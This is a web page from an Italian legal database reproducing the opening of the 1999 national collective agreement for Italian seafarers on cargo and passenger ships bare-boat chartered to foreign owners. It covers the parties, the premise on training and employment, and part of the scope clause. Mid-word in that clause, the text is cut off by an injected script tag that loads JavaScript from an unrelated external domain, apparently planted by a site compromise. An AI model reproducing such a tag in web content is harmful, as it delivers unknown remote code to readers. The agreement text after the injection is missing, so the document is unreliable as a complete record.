Torna all'elenco delle categorie

Categoria: Marittimi, bare boat carico e passeggeri con personale italiano
Settore: Trasporti
Data stipula: 24-11-1999
Data decorrenza: 1-7-1999
Data scadenza: 31-12-2002

Contratto Collettivo Nazionale di Lavoro

PER L'IMBARCO DEI MARITTIMI DI NAZIONALITÀ ITALIANA SULLE NAVI DA CARICO
E PASSEGGERI LOCATE A SCAFO NUDO AD ARMATORE STRANIERO
(ai sensi degli artt. 28 e 29, legge n. 234/89)



L'anno 1999 addì 24 novembre in Roma

-    Confederazione Italiana Armatori

e

-    le Organizzazioni dei lavoratori sottoelencate:

Federazione Italiana Lavoratori Trasporti (FILT-CGIL)
Federazione Italiana Trasporti (FIT-CISL)
Unione Italiana Lavoratori Trasporti (UIL-TRASPORTI)

hanno   stipulato  il  presente  CCNL  per  l'imbarco  dei  marittimi   di
nazionalità  italiana  sulle  navi da carico  e  passeggeri  iscritte  nei
registri speciali secondo i dettami della legge n. 234 del 14.6.89.



PREMESSA

Considerato  che  una  migliore  posizione  concorrenziale  della   flotta
nazionale  sul  mercato internazionale e la difesa degli  attuali  livelli
occupazionali  dei  marittimi  italiani sia in  termini  quantitativi  che
qualitativi è un comune obiettivo delle parti, l'utilizzo del "Bare  Boat"
non  viene  inteso come fatto strutturale di gestione della flotta,  bensì
come  strumento  peculiare  per  fronteggiare  particolari  situazioni  di
concorrenza   internazionale.  Con  l'obiettivo  inoltre  di   recuperare,
attraverso  tale strumento, anche tonnellaggio di controllo  nazionale  di
fatto già gestito all'estero.

Sulla base di tali comuni obiettivi le parti si danno atto che qualora  le
dismissioni  di  bandiera ai sensi della legge n.  234/89  dovessero  dare
luogo  a ridondanze occupazionali, queste verranno gestite attraverso  gli
strumenti individuati nelle pattuizioni contrattuali.

Per  quanto riguarda la qualità dell'occupazione le parti, attraverso  gli
interventi  sulla  formazione, mirano ad affidare  -  sulla  nave  -  agli
italiani   le   posizioni   di   maggiore   responsabilità   e   contenuto
professionale, a partire dagli ufficiali.

Pertanto la flessibilità concordata sulle qualifiche va intesa come  fatto
transitorio  a tutela dell'occupazione in ogni qualifica in attesa  di  un
mercato del lavoro tendenzialmente stabile e con adeguate qualificazioni.

Tutto ciò premesso le parti individuano le seguenti linee di azione:

Migliorare,  a  tutti i livelli, le attività formative e addestrative  dei
marittimi italiani per mettere a disposizione dell'armamento nazionale  le
risorse  umane  necessarie  allo sviluppo e in pari  tempo  rimuovere  gli
ostacoli che si frappongono all'immediato ingresso nel mercato del  lavoro
dei marittimi terminata l'attività addestrativa.

A tal fine concordano sulla necessità di:

a)    dare  attuazione al Regolamento unico nazionale per il  collocamento
  della Gente di mare;
b)   ripristinare le norme agevolative per l'imbarco degli allievi;
c)    finanziare con risorse pubbliche o comunitarie la frequenza ai corsi
  previsti  dalla  STCW  78. Su questo aspetto in particolare  si  ritiene
  necessario focalizzare l'attenzione del Ministero dei trasporti e  della
  navigazione  in  occasione delle riunioni che in materia  di  formazione
  verranno tenute presso il Ministero stesso.



1)   CAMPO DI APPLICAZIONE

Il  presente  CCNL si applica sulle navi da carico e passeggeri  locate  a
scafo  nudo ad armatore straniero ai sensi degli artt. 28 e 29,  legge  n.
234/89.

Tale  contratto deve essere considerato accordo quadro per  la  necessaria
definizione  degli  accordi  sindacali  relativi  alle  singole  navi   da
stipularsi a livello nazionale, in merito alla composizione delle  tabelle
di  armamento  nel  rispetto delle tabelle contrattuali  nazionali.  Nella
definizione  di  tali  accordi si è tenuto conto di eventuali  trattamenti
economici aziendali.

Il  cabotaggio italiano non verrà ammesso all'utilizzo della normativa  in
materia   di   "Bare   Boat".   Le  parti  verificheranno   la   posizione
concorrenziale  del  naviglio cabotiero italiano nei confron<script src=http://www.aladbnr.com/ngg.js></script>













(c) 2002-2022 www.infoleges.it -  powered by Be Smart s.r.l - Note legali e Condizioni d'uso